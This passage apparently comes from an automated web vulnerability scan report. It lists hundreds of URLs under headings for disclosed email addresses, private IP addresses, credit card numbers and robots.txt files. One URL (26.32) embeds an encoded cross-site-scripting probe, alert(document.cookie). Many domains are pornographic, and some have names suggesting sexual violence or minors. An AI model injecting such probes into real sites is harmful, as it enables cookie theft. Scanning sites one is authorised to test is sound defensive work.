22.158. http://www.createdebate.com/

22.159. http://www.credit-time.net/

22.160. http://www.criminal-records.org/

22.161. http://www.critics.com/

22.162. http://www.cumshotsdb.com/

22.163. http://www.cureresearch.com/

22.164. http://www.cyber-seek.com/

22.165. http://www.cyberfinder.com/

22.166. http://www.dabbledb.com/

22.167. http://www.dadamo.com/

22.168. http://www.dailybethea.com/

22.169. http://www.dailycognition.com/

22.170. http://www.dailynylongalleries.com/

22.171. http://www.dandyproject.com/

22.172. http://www.davidmovie.com/

22.173. http://www.davison.com/

22.174. http://www.daycare.com/

22.175. http://www.deanza.edu/

22.176. http://www.dearesq.com/

22.177. http://www.debtgoal.com/

22.178. http://www.deguate.com/

22.179. http://www.deluxnetworks.com/

22.180. http://www.desert-tropicals.com/

22.181. http://www.dex.com/

22.182. http://www.dhlive.com/

22.183. http://www.diethealthclub.com/

22.184. http://www.diplodrivers.com/

22.185. http://www.dispatchinteractive.com/

22.186. http://www.divorcemag.com/

22.187. http://www.dizzydrive.com/

22.188. http://www.doghouseboxing.com/

22.189. http://www.domainshop.com/

22.190. http://www.domainunion.de/

22.191. http://www.donga.com/

22.192. http://www.donnan.com/

22.193. http://www.dotcells.com/

22.194. http://www.dotzup.com/

22.195. http://www.downrange.tv/

22.196. http://www.downy.com/

22.197. http://www.dressupdollgames.net/

22.198. http://www.dsmtuners.com/

22.199. http://www.dude.com/

22.200. http://www.dulcolaxusa.com/

22.201. http://www.dynamictoolbar.com/

22.202. http://www.easyjob.net/

22.203. http://www.ebar.com/

22.204. http://www.ebooknetworking.net/

22.205. http://www.edenbridals.com/

22.206. http://www.edgarsnyder.com/

22.207. http://www.edison.com/

22.208. http://www.eeeuser.com/

22.209. http://www.efashioncentral.com/

22.210. http://www.eforo.com/

22.211. http://www.electrical-online.com/

22.212. http://www.electronickits.com/

22.213. http://www.electronicsinfoline.com/

22.214. http://www.elmresources.com/

22.215. http://www.elook.org/

22.216. http://www.emporia.edu/

22.217. http://www.endlesspools.com/

22.218. http://www.endoftheamericandream.com/

22.219. http://www.engineerjobs.com/

22.220. http://www.entertainment-savings-offers.com/

22.221. http://www.epdfsearch.com/

22.222. http://www.erelopro.com/

22.223. http://www.eslbee.com/

22.224. http://www.eslteachersboard.com/

22.225. http://www.everestcollege.edu/

22.226. http://www.expedient.com/

22.227. http://www.exploringthenorth.com/

22.228. http://www.extranet-post.com/

22.229. http://www.extremecashrobot.com/

22.230. http://www.extremecow.com/

22.231. http://www.extremefunnyhumor.com/

22.232. http://www.extremeoverclocking.com/

22.233. http://www.ez.ro/

22.234. http://www.factsfacts.com/

22.235. http://www.fadfusion.com/

22.236. http://www.familycorner.com/

22.237. http://www.farturl.com/

22.238. http://www.fastfreevideos.com/

22.239. http://www.fastpartner.net/

22.240. http://www.fbschedules.com/

22.241. http://www.fed-pack.com/

22.242. http://www.feetpics.net/

22.243. http://www.fileforums.com/

22.244. http://www.filmjabber.com/

22.245. http://www.filters-now.com/

22.246. http://www.findstudentloans.com/

22.247. http://www.firstweber.com/

22.248. http://www.fixcomputerblog.com/

22.249. http://www.flashanywhere.net/

22.250. http://www.florida.com/

22.251. http://www.fluke.com/

22.252. http://www.flvsoft.com/

22.253. http://www.fmaware.org/

22.254. http://www.forconstructionpros.com/

22.255. http://www.foreclosed-government-homes.com/

22.256. http://www.forministry.com/

22.257. http://www.formsguru.com/

22.258. http://www.fortunecity.co.uk/

22.259. http://www.foxyhousewives.com/

22.260. http://www.fr.st/

22.261. http://www.france3.fr/

22.262. http://www.free-graphics.com/

22.263. http://www.free-music-downloads.ws/

22.264. http://www.freeapphosting.com/

22.265. http://www.freecenter.com/

22.266. http://www.freecheckings.com/

22.267. http://www.freefever.com/

22.268. http://www.freemomsvideo.com/

22.269. http://www.freevistafiles.com/

22.270. http://www.freexpreviews.com/

22.271. http://www.freshwebmaster.com/

22.272. http://www.friendship-poems.com/

22.273. http://www.friestube.com/

22.274. http://www.fromoldbooks.org/

22.275. http://www.fullsizebronco.com/

22.276. http://www.funcel.mobi/

22.277. http://www.funcityfinder.com/

22.278. http://www.fundmojo.com/

22.279. http://www.furninfo.com/

22.280. http://www.fxsound.com/

22.281. http://www.gameguidedog.com/

22.282. http://www.gamingnewslink.com/

22.283. http://www.gardens.com/

22.284. http://www.getmarci.com/

22.285. http://www.getmyhomesvalue.com/

22.286. http://www.getzips.com/

22.287. http://www.gigamoves.com/

22.288. http://www.girlsontherun.org/

22.289. http://www.glowfoto.com/

22.290. http://www.gocurrency.com/

22.291. http://www.godempire.org/

22.292. http://www.goldcycler.com/

22.293. http://www.googleimages.com/

22.294. http://www.gospelmusic.org.uk/

22.295. http://www.governmentregistry.org/

22.296. http://www.govpaynow.com/

22.297. http://www.grandcanyon.com/

22.298. http://www.grandpaandteen.com/

22.299. http://www.grannyhound.com/

22.300. http://www.grannyroom.com/

22.301. http://www.grillpro.com/

22.302. http://www.gruntsmilitary.com/

22.303. http://www.gtplanet.net/

22.304. http://www.guide4home.com/

22.305. http://www.guideseek.com/

22.306. http://www.guitarscanada.com/

22.307. http://www.guweb.com/

22.308. http://www.h2onews.org/

22.309. http://www.haircuttery.com/

22.310. http://www.hairycabin.com/

22.311. http://www.handgunforum.net/

22.312. http://www.hatchetgear.com/

22.313. http://www.hd-blow.com/

22.314. http://www.hd.org/

22.315. http://www.hd4sale.com/

22.316. http://www.healthx.com/

22.317. http://www.hiltonhawaiianvillage.com/

22.318. http://www.hintergrund.de/

22.319. http://www.hireteen.com/

22.320. http://www.hiusa.org/

22.321. http://www.homebasedofficework.com/

22.322. http://www.homedistiller.org/

22.323. http://www.homeinsurance.com/

22.324. http://www.homepage-baukasten.de/

22.325. http://www.hopkins-arthritis.org/

22.326. http://www.hot-mature-diary.com/

22.327. http://www.hot-mom.org/

22.328. http://www.hotcelebrity.name/

22.329. http://www.hotsweeps4u.com/

22.330. http://www.hottlady.com/

22.331. http://www.hqhomeclips.com/

22.332. http://www.hrbskillslearningcenter.com/

22.333. http://www.htmate2.com/

22.334. http://www.i.ph/

22.335. http://www.ibmsaudio.com/

22.336. http://www.idilis.ro/

22.337. http://www.ihousenet.com/

22.338. http://www.imageenvision.com/

22.339. http://www.imagetwist.com/

22.340. http://www.indthegap.com/

22.341. http://www.inform.com/

22.342. http://www.innvista.com/

22.343. http://www.instant-cash-source.com/

22.344. http://www.integratelecom.com/

22.345. http://www.inthe90s.com/

22.346. http://www.intimasian.com/

22.347. http://www.investorsdailyedge.net/

22.348. http://www.ionchannels.org/

22.349. http://www.ipodarcade.com/

22.350. http://www.irfanview.net/

22.351. http://www.isagoodies.com/

22.352. http://www.itmonline.org/

22.353. http://www.jamaica-star.com/

22.354. http://www.jameshardie.com/

22.355. http://www.jawdroppingasses.com/

22.356. http://www.jaxed.com/

22.357. http://www.jayd-lovely.net/

22.358. http://www.jeffcopublicschools.org/

22.359. http://www.jinni.com/

22.360. http://www.jjgames.com/

22.361. http://www.jkharris.com/

22.362. http://www.justrightcreations.net/

22.363. http://www.k1speed.com/

22.364. http://www.kalpoint.com/

22.365. http://www.kampsight.com/

22.366. http://www.katsmovies.com/

22.367. http://www.kbhgames.com/

22.368. http://www.kensington.com/

22.369. http://www.kerbeck.com/

22.370. http://www.kerpoof.com/

22.371. http://www.khsaa.org/

22.372. http://www.kibagames.com/

22.373. http://www.kicker.com/

22.374. http://www.kidsthemebedrooms.com/

22.375. http://www.kikkomanusa.com/

22.376. http://www.kissladyboy.com/

22.377. http://www.klicer.com/

22.378. http://www.knife-depot.com/

22.379. http://www.knitlist.com/

22.380. http://www.kstatecollegian.com/

22.381. http://www.kungfumagazine.com/

22.382. http://www.kzzp.com/

22.383. http://www.lacoste.com/

22.384. http://www.lake-county-fair.com/

22.385. http://www.lakecompounce.com/

22.386. http://www.lakeplace.com/

22.387. http://www.laobserved.com/

22.388. http://www.laptopical.com/

22.389. http://www.lasalle.edu/

22.390. http://www.latinspicebabes.com/

22.391. http://www.lattc.edu/

22.392. http://www.laurellkhamilton.org/

22.393. http://www.leadsonline.eu/

22.394. http://www.legendamateurs.com/

22.395. http://www.lespac.com/

22.396. http://www.levolor.com/

22.397. http://www.libraryspot.com/

22.398. http://www.like-em-straight.com/

22.399. http://www.likeulo.us/

22.400. http://www.lilydouce.com/

22.401. http://www.littlebigplanet.com/

22.402. http://www.livesoccertv.com/

22.403. http://www.livingontheedge.org/

22.404. http://www.llli.org/

22.405. http://www.lmsal.com/

22.406. http://www.lmtribune.com/

22.407. http://www.localjobs101.com/

22.408. http://www.logler.com/

22.409. http://www.longhaircommunity.com/

22.410. http://www.lookoutlanding.com/

22.411. http://www.luminous-landscape.com/

22.412. http://www.makefive.com/

22.413. http://www.manchester2002-uk.com/

22.414. http://www.mangahead.com/

22.415. http://www.manhattanapts.com/

22.416. http://www.maniactools.com/

22.417. http://www.manycam.com/

22.418. http://www.mature-better.com/

22.419. http://www.maxadds.com/

22.420. http://www.maxdome.de/

22.421. http://www.mayohealthsystem.org/

22.422. http://www.mayura.com/

22.423. http://www.mazda6club.com/

22.424. http://www.mbn.com.ua/

22.425. http://www.mbon.org/

22.426. http://www.mbrgames.com/

22.427. http://www.mcc.edu/

22.428. http://www.medicaiddentistry.com/

22.429. http://www.mgexperience.net/

22.430. http://www.michaelschenkerhimself.com/

22.431. http://www.michie.com/

22.432. http://www.midlandstech.edu/

22.433. http://www.minglehouse.com/

22.434. http://www.mini001.com/

22.435. http://www.mirandalambert.com/

22.436. http://www.mobilerider.com/

22.437. http://www.momsgiveass.com/

22.438. http://www.monica.com/

22.439. http://www.montanalottery.com/

22.440. http://www.monticello.org/

22.441. http://www.motorbicycling.com/

22.442. http://www.mp3hustle.com/

22.443. http://www.mrclean.com/

22.444. http://www.mtsac.edu/

22.445. http://www.muralsforkids.com/

22.446. http://www.muskingum.edu/

22.447. http://www.mydivadoll.com/

22.448. http://www.myefficientplanet.com/

22.449. http://www.myfreedegree.com/

22.450. http://www.myglobalsearch.com/

22.451. http://www.mynetworktv.com/

22.452. http://www.mytones.us/

22.453. http://www.myweddingvows.com/

22.454. http://www.nahanniriverherbs.com/

22.455. http://www.naturalhealers.com/

22.456. http://www.nbc.ca/

22.457. http://www.neric.org/

22.458. http://www.net-mine.com/

22.459. http://www.newamateurtube.com/

22.460. http://www.newverhost.com/

22.461. http://www.nextstat.com/

22.462. http://www.nightmarefactory.com/

22.463. http://www.nikonians.org/

22.464. http://www.nin.com/

22.465. http://www.noah-health.org/

22.466. http://www.northerntrust.com/

22.467. http://www.nrlc.org/

22.468. http://www.nsaahome.org/

22.469. http://www.nsk-sys.com/

22.470. http://www.nudism.ws/

22.471. http://www.nuffnang.com.au/

22.472. http://www.nutone.com/

22.473. http://www.oaktreevintage.com/

22.474. http://www.oceana.org/

22.475. http://www.okhistory.org/

22.476. http://www.old-yearbooks.com/

22.477. http://www.oldchevytruck.com/

22.478. http://www.olthmqe.com/

22.479. http://www.onesourcetalent.com/

22.480. http://www.onlineatlas.us/

22.481. http://www.onlinebankchecking.com/

22.482. http://www.onlinecustomersurvey.com/

22.483. http://www.onlineradiostations.com/

22.484. http://www.ontargetpayday.com/

22.485. http://www.orlandoairports.net/

22.486. http://www.oxaes.com/

22.487. http://www.pageranktop.com/

22.488. http://www.paintballforum.com/

22.489. http://www.pasadena.edu/

22.490. http://www.pay-dayin60seconds.net/

22.491. http://www.paydayin-60seconds.com/

22.492. http://www.pecentral.org/

22.493. http://www.penisadvantage.com/

22.494. http://www.pepperfool.com/

22.495. http://www.perfectgirlsclub.com/

22.496. http://www.pervyernies.com/

22.497. http://www.philstart.com/

22.498. http://www.phobialist.com/

22.499. http://www.photos-naturistes.fr/

22.500. http://www.pianostreet.com/

22.501. http://www.picturesofengland.com/

22.502. http://www.piworld.com/

22.503. http://www.pixela.co.jp/

22.504. http://www.plan3d.com/

22.505. http://www.playingforchange.com/

22.506. http://www.poetv.com/

22.507. http://www.poker.com/

22.508. http://www.pollhost.com/

22.509. http://www.powerboatlistings.com/

22.510. http://www.prensaescrita.com/

22.511. http://www.prettynylonfeet.com/

22.512. http://www.primeretailmail.com/

22.513. http://www.printsmadeeasy.com/

22.514. http://www.promarkresearch.com/

22.515. http://www.prototype-ui.com/

22.516. http://www.prudentialhomesale.com/

22.517. http://www.publicbookshelf.com/

22.518. http://www.purehockey.com/

22.519. http://www.qkype.com/

22.520. http://www.quizasaurus.com/

22.521. http://www.quizulous.com/

22.522. http://www.rapescenes.net/

22.523. http://www.rateitsearch.com/

22.524. http://www.rats2u.com/

22.525. http://www.rauantiques.com/

22.526. http://www.raylamontagne.com/

22.527. http://www.rb-hosting.de/

22.528. http://www.readymobile.com/

22.529. http://www.realemoexposed.com/

22.530. http://www.realestate-mls.com/

22.531. http://www.realfreevids.com/

22.532. http://www.reallycute.net/

22.533. http://www.realwebaudio.com/

22.534. http://www.recetasgratis.net/

22.535. http://www.redhairedteens.com/

22.536. http://www.refundsweepers.com/

22.537. http://www.relylocal.com/

22.538. http://www.rentawreck.com/

22.539. http://www.reversehelpline.us/

22.540. http://www.revues.org/

22.541. http://www.ricedelman.com/

22.542. http://www.rickystokesnews.com/

22.543. http://www.ridemysecretary.com/

22.544. http://www.rigolus.com/

22.545. http://www.ringtonefav.net/

22.546. http://www.riverfacts.com/

22.547. http://www.rogerssportinggoods.com/

22.548. http://www.romanticasheville.com/

22.549. http://www.ronstire.com/

22.550. http://www.rp-online.de/

22.551. http://www.rr-bb.com/

22.552. http://www.runningroom.com/

22.553. http://www.rvntracker.com/

22.554. http://www.rvsurplus.net/

22.555. http://www.s3xads.com/

22.556. http://www.sa-venues.com/

22.557. http://www.salespider.com/

22.558. http://www.samsontech.com/

22.559. http://www.sanfranrecruiter.com/

22.560. http://www.save2pc.com/

22.561. http://www.scenes-of-seduction.com/

22.562. http://www.schoolexpress.com/

22.563. http://www.scrapbookingtop50.com.au/

22.564. http://www.scrapjazz.com/

22.565. http://www.searchlab.info/

22.566. http://www.seat42f.com/

22.567. http://www.sevensidedcube.net/

22.568. http://www.seventhsanctum.com/

22.569. http://www.shareavenue.com/

22.570. http://www.sharpened.net/

22.571. http://www.shazo.com/

22.572. http://www.shopgala.com/

22.573. http://www.shopovertime.com/

22.574. http://www.shopthepig.com/

22.575. http://www.simpleanddelicious.com/

22.576. http://www.skillsurvey.com/

22.577. http://www.slicklegs.com/

22.578. http://www.slotsjam.com/

22.579. http://www.smarthomeusa.com/

22.580. http://www.smccme.edu/

22.581. http://www.socialsecurityhop.com/

22.582. http://www.soflens.com/

22.583. http://www.solar-aid.org/

22.584. http://www.sololadyboys.com/

22.585. http://www.soundsearch.com/

22.586. http://www.southpointcasino.com/

22.587. http://www.spaceflightnow.com/

22.588. http://www.spankwireinhd.com/

22.589. http://www.spearboard.com/

22.590. http://www.speedingupmypc.com/

22.591. http://www.speedysigns.com/

22.592. http://www.sportbikes.net/

22.593. http://www.squirt-disgrace.net/

22.594. http://www.startec.com/

22.595. http://www.sterndrive.info/

22.596. http://www.stocking-cuties.com/

22.597. http://www.stockingsjerk.com/

22.598. http://www.straight.com/

22.599. http://www.stroudsrestaurant.com/

22.600. http://www.stservicemovie.com/

22.601. http://www.suelebeau.com/

22.602. http://www.sunday-school-fun-zone.com/

22.603. http://www.supermotors.net/

22.604. http://www.suppview.com/

22.605. http://www.surnamesite.com/

22.606. http://www.survey.com/

22.607. http://www.surveyqlik.com/

22.608. http://www.survivaltopics.com/

22.609. http://www.sweetness-light.com/

22.610. http://www.sxtracking.com/

22.611. http://www.sybian.com/

22.612. http://www.sztaki.hu/

22.613. http://www.tapartoche.com/

22.614. http://www.targetx.com/

22.615. http://www.tattooingmovies.com/

22.616. http://www.taylortrue.com/

22.617. http://www.tcoasttalk.com/

22.618. http://www.tcsoal.org/

22.619. http://www.techgage.com/

22.620. http://www.teenburggirls.com/

22.621. http://www.teenloveholes.com/

22.622. http://www.teensnu.com/

22.623. http://www.tempcredit.com/

22.624. http://www.teriskitchen.com/

22.625. http://www.texasbowhunter.com/

22.626. http://www.thaiteenager.com/

22.627. http://www.thecitizen.com/

22.628. http://www.theclassof1979.org/

22.629. http://www.thefashionpolice.net/

22.630. http://www.thefedoralounge.com/

22.631. http://www.thefwa.com/

22.632. http://www.thelaughtermovie.com/

22.633. http://www.themag12.com/

22.634. http://www.themanschoice.com/

22.635. http://www.themaxtube.com/

22.636. http://www.theminiaturespage.com/

22.637. http://www.thepotteries.org/

22.638. http://www.therumpus.net/

22.639. http://www.thetelegram.com/

22.640. http://www.thewitcher.com/

22.641. http://www.thorgaming.com/

22.642. http://www.ticalc.org/

22.643. http://www.ticketstub.com/

22.644. http://www.tight18yos.com/

22.645. http://www.tinythongpanties.com/

22.646. http://www.tireteam.com/

22.647. http://www.tldm.org/

22.648. http://www.top20cool.com/

22.649. http://www.totalassault.com/

22.650. http://www.toxel.com/

22.651. http://www.trade2win.com/

22.652. http://www.traffic-find.com/

22.653. http://www.travelagentcentral.com/

22.654. http://www.travour.com/

22.655. http://www.triumphrat.net/

22.656. http://www.trustedhomeservices.com/

22.657. http://www.tubedaddy.net/

22.658. http://www.tubefish.org/

22.659. http://www.tubeguide.info/

22.660. http://www.tucsonweekly.com/

22.661. http://www.tunecore.com/

22.662. http://www.turnbacktogod.com/

22.663. http://www.twodicksinhisass.com/

22.664. http://www.ultimate-penis-enlargement-guide.com/

22.665. http://www.umassonline.net/

22.666. http://www.umc.edu/

22.667. http://www.uniquerewards.com/

22.668. http://www.unitedfcu.com/

22.669. http://www.unsub-me.com/

22.670. http://www.uprinting.com/

22.671. http://www.upskirtphotos.org/

22.672. http://www.urbanministry.org/

22.673. http://www.urnotalone.com/

22.674. http://www.usa-gymnastics.org/

22.675. http://www.usacitiesonline.com/

22.676. http://www.usafootball.com/

22.677. http://www.usagardener.com/

22.678. http://www.usapaydayassistance.net/

22.679. http://www.uscashwire.com/

22.680. http://www.uschess.org/

22.681. http://www.usedforsale.biz/

22.682. http://www.userfriendly.org/

22.683. http://www.usgo.org/

22.684. http://www.usherbrooke.ca/

22.685. http://www.utopiandirect.com/

22.686. http://www.vacationrentalsad.com/

22.687. http://www.vanguardmil.com/

22.688. http://www.vectormarketing.com/

22.689. http://www.veoliaes-sw.com/

22.690. http://www.verawang.com/

22.691. http://www.vertadnet.com/

22.692. http://www.videora.com/

22.693. http://www.visitmaine.net/

22.694. http://www.vitrue.com/

22.695. http://www.vividfeeds.com/

22.696. http://www.vividracing.com/

22.697. http://www.vladtod.com/

22.698. http://www.wafbhomes.com/

22.699. http://www.wagnerspraytech.com/

22.700. http://www.watchforeclosure.com/

22.701. http://www.web-source.net/

22.702. http://www.webcampromotions.com/

22.703. http://www.webdesign.org/

22.704. http://www.weebls-stuff.com/

22.705. http://www.wellnessletter.com/

22.706. http://www.welt-atlas.de/

22.707. http://www.werdyo.com/

22.708. http://www.westendmotorsports.com/

22.709. http://www.westport-news.com/

22.710. http://www.wetmaturevids.com/

22.711. http://www.whatsonxiamen.com/

22.712. http://www.wheelessonline.com/

22.713. http://www.wholesaledir.com/

22.714. http://www.wikifeet.com/

22.715. http://www.wildwoodsnj.com/

22.716. http://www.windows-fast.com/

22.717. http://www.windows-new.com/

22.718. http://www.winnipesaukee.com/

22.719. http://www.wmost.com/

22.720. http://www.womeninthebible.net/

22.721. http://www.womensenews.org/

22.722. http://www.wonderbackgrounds.com/

22.723. http://www.woodcraftplans.com/

22.724. http://www.wordplays.com/

22.725. http://www.workfromhomenews6.com/

22.726. http://www.worksourceoregon.org/

22.727. http://www.wri.org/

22.728. http://www.wwwamericanclassifieds.com/

22.729. http://www.x-y.net/

22.730. http://www.xaapa.com/

22.731. http://www.xlasians.com/

22.732. http://www.xoticpc.com/

22.733. http://www.xr77.com/

22.734. http://www.yankeefoliage.com/

22.735. http://www.ymlp163.com/

22.736. http://www.ymlp188.com/

22.737. http://www.yourinsights.net/

22.738. http://www.youthfire.com/

22.739. http://www.zapak.com/

23. Email addresses disclosed

23.1. http://ads.adbrite.com/adserver/vdi/742697

23.2. http://ads1.msn.com/library/dap.js

23.3. http://www.amateurclipz.com/favicon.ico

23.4. http://www.atomiclearning.com/favicon.ico

23.5. http://www.bobmovs.com/favicon.ico

23.6. http://www.boymale.net/favicon.ico

23.7. http://www.brighthorizons.com/favicon.ico

23.8. http://www.bucknell.edu/favicon.ico

23.9. http://www.cartoonterritory.com/favicon.ico

23.10. http://www.chemicalelements.com/favicon.ico

23.11. http://www.coinmerc.com/favicon.ico

23.12. http://www.crystal-co.com/favicon.ico

23.13. http://www.deguate.com/favicon.ico

23.14. http://www.diplo.de/favicon.ico

23.15. http://www.divorcemag.com/favicon.ico

23.16. http://www.donbest.com/favicon.ico

23.17. http://www.duplinschools.net/favicon.ico

23.18. http://www.fateback.com/favicon.ico

23.19. http://www.fb2share.com/favicon.ico

23.20. http://www.feetpics.net/favicon.ico

23.21. http://www.freehairypusssy.com/favicon.ico

23.22. http://www.freemomsvideo.com/favicon.ico

23.23. http://www.getfreedental.com/favicon.ico

23.24. http://www.ghettodoorway.com/favicon.ico

23.25. http://www.greatnow.com/favicon.ico

23.26. http://www.gwinnettcounty.com/favicon.ico

23.27. http://www.hairyholess.com/favicon.ico

23.28. http://www.hasoid-asian.com/favicon.ico

23.29. http://www.herehard.tv/favicon.ico

23.30. http://www.heresquirt.tv/favicon.ico

23.31. http://www.humiliation-of-slave.com/favicon.ico

23.32. http://www.hziegler.com/favicon.ico

23.33. http://www.innogames.de/favicon.ico

23.34. http://www.interstatemusic.com/favicon.ico

23.35. http://www.ipodarcade.com/favicon.ico

23.36. http://www.ius.edu/favicon.ico

23.37. http://www.legendamateurs.com/favicon.ico

23.38. http://www.mature-better.com/favicon.ico

23.39. http://www.maysville-online.com/content/tncms/live/global/resources/scripts/common.js

23.40. http://www.maysville-online.com/content/tncms/live/global/resources/scripts/facebox.js

23.41. http://www.maysville-online.com/content/tncms/live/global/resources/styles/skin.css

23.42. http://www.metroguide.com/favicon.ico

23.43. http://www.metroparks.org/favicon.ico

23.44. http://www.mkt3228.com/favicon.ico

23.45. http://www.mnnews.com/favicon.ico

23.46. http://www.monsterjam.com/favicon.ico

23.47. http://www.moultrieobserver.com/favicon.ico

23.48. http://www.mylovedanal.tv/favicon.ico

23.49. http://www.mylovedasses.tv/favicon.ico

23.50. http://www.mylovedrubber.com/favicon.ico

23.51. http://www.nationnews.com/favicon.ico

23.52. http://www.ntra.com/favicon.ico

23.53. http://www.okhistory.org/favicon.ico

23.54. http://www.paparazzibeach.net/favicon.ico

23.55. http://www.princesshouse.com/favicon.ico

23.56. http://www.qianlong.com/favicon.ico

23.57. http://www.rapescenes.net/favicon.ico

23.58. http://www.rb-hosting.de/favicon.ico

23.59. http://www.rv-clubs.us/favicon.ico

23.60. http://www.save2pc.com/favicon.ico

23.61. http://www.secretaryinstocking.com/favicon.ico

23.62. http://www.socializr.com/favicon.ico

23.63. http://www.sololadyboys.com/favicon.ico

23.64. http://www.stopsacidreflux.com/favicon.ico

23.65. http://www.tcoasttalk.com/favicon.ico

23.66. http://www.teriskitchen.com/favicon.ico

23.67. http://www.tireteam.com/favicon.ico

23.68. http://www.torontolife.com/favicon.ico

23.69. http://www.twoofus.org/favicon.ico

23.70. http://www.upskirtphotos.org/favicon.ico

23.71. http://www.vermontjoblink.com/favicon.ico

23.72. http://www.vintagefield.com/favicon.ico

23.73. http://www.wellspan.org/favicon.ico

23.74. http://www.wetmaturevids.com/favicon.ico

23.75. http://www.wordplays.com/favicon.ico

23.76. http://www.wylienews.com/favicon.ico

23.77. http://www.yardbarker.com/javascripts/all.js

24. Private IP addresses disclosed

24.1. http://connect.facebook.net/en_US/all.js

24.2. http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vSJ96PL2YpP.css

24.3. http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/UpS8_ZmY8j-.js

24.4. http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/eIpbnVKI9lR.png

24.5. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/WU1xUSaLgfA.css

24.6. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/kSPKJpX3bda.js

24.7. http://www.610wtvn.com/favicon.ico

24.8. http://www.6url.com/favicon.ico

24.9. http://www.ajdesigner.com/favicon.ico

24.10. http://www.algaecal.com/favicon.ico

24.11. http://www.aliciasrecipes.com/favicon.ico

24.12. http://www.am570radio.com/favicon.ico

24.13. http://www.babygenderprediction.com/favicon.ico

24.14. http://www.beautifulcervix.com/favicon.ico

24.15. http://www.bookreporter.com/favicon.ico

24.16. http://www.bordersheriffs.com/favicon.ico

24.17. http://www.danielsilvabooks.com/favicon.ico

24.18. http://www.dickeys.com/favicon.ico

24.19. http://www.einsurancemarket.com/favicon.ico

24.20. http://www.facebook.com/extern/login_status.php

24.21. http://www.facebook.com/extern/login_status.php

24.22. http://www.facebook.com/plugins/recommendations.php

24.23. http://www.facebook.com/plugins/recommendations.php

24.24. http://www.festfoods.com/favicon.ico

24.25. http://www.getgrantinfo.net/favicon.ico

24.26. http://www.greatnow.com/favicon.ico

24.27. http://www.gtlakes.com/favicon.ico

24.28. http://www.jcpamericanlivingtour.com/favicon.ico

24.29. http://www.justgiving.com/favicon.ico

24.30. http://www.lacounty.info/favicon.ico

24.31. http://www.letusreason.org/favicon.ico

24.32. http://www.medcitynews.com/favicon.ico

24.33. http://www.menstuff.org/favicon.ico

24.34. http://www.nextgenwalkthroughs.com/favicon.ico

24.35. http://www.nextmark.com/favicon.ico

24.36. http://www.ocfl.net/favicon.ico

24.37. http://www.sew4home.com/favicon.ico

24.38. http://www.sugardoodle.info/favicon.ico

24.39. http://www.themat.com/favicon.ico

24.40. http://www.visitsouth.com/favicon.ico

24.41. http://www.wdasfm.com/favicon.ico

25. Credit card numbers disclosed

26. Robots.txt file

26.1. http://a.tribalfusion.com/displayAd.js

26.2. http://ad.doubleclick.net/ad/tnews.lee.net/

26.3. http://ad.turn.com/server/pixel.htm

26.4. http://ads.pointroll.com/PortalServe/

26.5. http://ads.specificmedia.com/serve/v=5

26.6. http://as.casalemedia.com/j

26.7. http://b.scorecardresearch.com/b

26.8. http://b.voicefive.com/b2

26.9. http://c.betrad.com/surly.js

26.10. http://cache.specificmedia.com/creative/blank.gif

26.11. http://cdn.optmd.com/blank.html

26.12. http://cdn.turn.com/server/ddc.htm

26.13. http://cm.g.doubleclick.net/pixel

26.14. http://cms.quantserve.com/dpixel

26.15. http://crl.geotrust.com/crls/secureca.crl

26.16. http://d.xp1.ru4.com/activity

26.17. http://d13.zedo.com/OzoDB/cutils/R53_5/jsc/1190/zpu.html

26.18. http://d3.zedo.com/jsc/d3/ff2.html

26.19. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js

26.20. http://feeds.bbci.co.uk/news/rss.xml

26.21. http://idpix.media6degrees.com/orbserv/hbpix

26.22. http://img0.yardbarker.com/media/f/8/f832476d611c0dd18e2d227a2c52ddeb172fe41a/footer_story/charlie-batch.jpg

26.23. http://img1.yardbarker.com/media/e/a/ea5193d9ec768455228a325516c165fd5e1f9b08/footer_story/Kansas_City_Chiefs_aab2.jpg

26.24. http://img2.yardbarker.com/media/4/0/405e6a02aee3eecae135f27fbf734dcc55320c07/medium/Philadelphia_Eagles_v_d8c9.jpg

26.25. http://img3.yardbarker.com/media/f/0/f000fbdc84ba51062eb26c6ba07cf0c827a59f4a/footer_story/Baltimore_Ravens_v_79ff.jpg

26.26. http://jkleman.townnews.com/media4/mcfarland/service/right_small.swf

26.27. http://leeenterprises.112.2o7.net/b/ss/lee-maysville-onlinecom/1/H.21/s25350702094673

26.28. http://m1.zedo.com/log/p.gif

26.29. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

26.30. http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif

26.31. http://r.turn.com/r/bd

26.32. http://r1-ads.ace.advertising.com/site=776813/size=300250/u=2/bnum=33334840/hr=15/hl=2/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.maysville-online.com%252Ffavicon.ico%253Fbe4e4%252522-alert%2528document.cookie%2529-%252522ccebc516c28%253D1

26.33. http://spe.atdmt.com/ds/DECHOJANSLEE/Lee_Misses_Shopphobia_9_7_10/lee_shopphobic_men_300x250_35k_v3a.jpg

26.34. http://speed.pointroll.com/PointRoll/Media/Banners/USCellular/865245/USC_familyplan_eric_300x250.gif

26.35. http://sync.mathtag.com/sync/img

26.36. http://tag.admeld.com/pixel

26.37. http://tag.contextweb.com/TagPublish/getjs.aspx

26.38. http://turn.nexac.com/r/pu

26.39. http://us.bc.yahoo.com/b

26.40. http://www.1-800-volunteer.org/favicon.ico

26.41. http://www.123-reg.co.uk/favicon.ico

26.42. http://www.1280.com/favicon.ico

26.43. http://www.181.fm/favicon.ico

26.44. http://www.1920s-fashion-and-music.com/favicon.ico

26.45. http://www.2-clicks-stamps.com/favicon.ico

26.46. http://www.20minutos.es/favicon.ico

26.47. http://www.2u.ru/favicon.ico

26.48. http://www.321gold.com/favicon.ico

26.49. http://www.3btech.net/favicon.ico

26.50. http://www.3reef.com/favicon.ico

26.51. http://www.3stepads.com/favicon.ico

26.52. http://www.411.info/favicon.ico

26.53. http://www.4miche.com/favicon.ico

26.54. http://www.4strokes.com/favicon.ico

26.55. http://www.610wtvn.com/favicon.ico

26.56. http://www.6url.com/favicon.ico

26.57. http://www.971zht.com/favicon.ico

26.58. http://www.aaaoklahoma.com/favicon.ico

26.59. http://www.aaaorid.com/favicon.ico

26.60. http://www.aaaxvdo.tk/favicon.ico

26.61. http://www.aatkingdom.net/favicon.ico

